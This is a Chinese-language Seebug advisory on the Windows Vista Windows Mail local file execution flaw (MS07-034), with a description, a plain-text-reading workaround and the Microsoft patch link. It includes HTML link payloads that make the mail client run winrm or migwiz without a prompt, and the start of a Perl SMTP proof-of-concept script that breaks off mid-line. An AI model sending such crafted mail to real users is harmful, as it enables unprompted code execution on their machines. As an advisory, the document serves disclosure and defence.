Vista Windows Mail客户端本地文件执行漏洞(MS07-034)

2007-06-14T00:00:00
ID SSV:1859
Type seebug
Reporter Root
Modified 2007-06-14T00:00:00

Description

Windows Mail是Windows Vista所捆绑的默认邮件客户端。

Vista Windows Mail在处理邮件中的链接时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行恶意代码。

如果文件夹中存在相同名称的可执行文件的话,则如果用户点击了邮件中恶意链接的话,Vistas Mail客户端就会执行该可执行文件。假设C:\盘下存在名为blah的文件夹,同时该盘下还存在名为blah.bat的批处理脚本,则如果用户点击了邮件中目标设置为C:\blah的URL的话,就会未经提示执行批处理脚本。

例如,发送包含有以下URL的HTML邮件消息:

<a href="c:/windows/system32/winrm?">Click here!</a> 或 <a href="c:/windows/system32/migwiz?">Click here!</a>

就会未经提示执行winrm.cmd/migwiz.exe。

Microsoft Windows Vista 临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

  • 以纯文本格式阅读邮件消息以防范HTML邮件攻击。

厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS07-034)以及相应补丁: MS07-034:Cumulative Security Update for Outlook Express and Windows Mail (929123) 链接:<a href="http://www.microsoft.com/technet/security/Bulletin/ms07-034.mspx?pf=true" target="_blank">http://www.microsoft.com/technet/security/Bulletin/ms07-034.mspx?pf=true</a>

                                        
                                            
                                                ---snip---
use&nbsp;Net::SMTP_auth;
$smtp&nbsp;=&nbsp;Net::SMTP_auth-&gt;new('smtp.1und1.de',&nbsp;Debug&nbsp;=&gt;&nbsp;1);

$smtp-&gt;auth('PLAIN',&nbsp;'username',&nbsp;'password');
$smtp-&gt;mail(&quot;attacker\